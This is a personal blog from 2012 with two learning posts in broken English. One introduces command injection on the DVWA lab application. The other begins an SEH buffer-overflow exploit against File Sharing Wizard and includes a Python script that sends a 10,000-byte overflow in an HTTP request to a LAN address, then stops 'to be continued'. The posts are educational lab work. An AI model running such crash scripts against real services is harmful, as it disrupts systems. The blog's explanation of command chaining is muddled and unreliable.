Sabtu, 17 Maret 2012

exploitation linux server with dvwa vuln

so long my blog can't access by me, cause damn game but very fun to do. now i learn how we can exploitation to system through web aplication vuln, in my virutal server has installed DVWA (Damn Vulnerability Web Aplication) i will attack them. now i will try to bugging error to decission attack system.

this picture is dvwa screen, in many vuln i will attack command execution service has available on dvwa. i think is so easy to try exploitaion. on linux command we can use two command on command same time example "ls | w" next command will be the firs execution than the first command.

Kamis, 01 Maret 2012

SEH (Exploitation File Sharing)

in this time i will try to developing exploitation with buffer overflow aplication have safeSEH / SEH, i will exploit file sharing wizard, in this time not so different just developing from exploitation before, like local exploit. but in this aplication have protection to buffer overflow, ok the firs like usually i will create exploitation program to first buffer and to analyse,,
to know how we made exploit we must sniff with wireshark to acompiling exploit to make buffer the aplication, in this time i founded aplication running on port 80 you can see at the picture
now i will make exploitation like a exploitation i made before:
! usr / bin / python
import socket
target_address = "192.168.4.44"
target_port = 80
buffer ="\x41" * 10000
buffer+=('fuck %s HTTP/1.1\r\n''\r\n') %(buffer)
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect = sock.connect ((target_address, target_port))
sock.send(buffer)
sock.close()

now see what happpen at file sharing wizard

aplication has crash :d, ok i will develop again
aplication has crash but EIP not overwrite because aplication file sharing have SEH, to see SEH click menu view then SEH chain, like the pciture. buffer has send save to SEH chain.
solution for aplication has SEH chain is POP POP RETN method.
now i make buffer again, now i will send string 10000 character
will be continued

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop